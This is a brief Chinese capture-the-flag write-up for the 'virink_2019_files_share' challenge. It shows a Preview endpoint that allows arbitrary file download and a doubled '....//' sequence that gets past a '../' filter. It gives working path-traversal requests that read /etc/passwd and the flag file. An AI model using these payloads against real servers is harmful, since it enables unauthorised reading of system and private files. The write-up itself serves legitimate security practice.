virink_2019_files_share

我们打开页面源码发现一个提示

image-20240924205211600

flag在f1ag_Is_h3re

我们扫描url发现uploads文件夹

image-20240924205936244

点击Preview,我们发现任意文件下载

我们用../index.php,发现../被过滤了

image-20240924210202198

那我们使用双写绕过

1
preview?f=....//....//....//....//....//....//....//....//....//....//etc..//passwd

image-20240924210601293

成功绕过

我们直接访问flag,得到flag

1
/preview?f=....//....//....//....//....//....//....//....//....//....//f1ag_Is_h3re..//flag

image-20240924210728559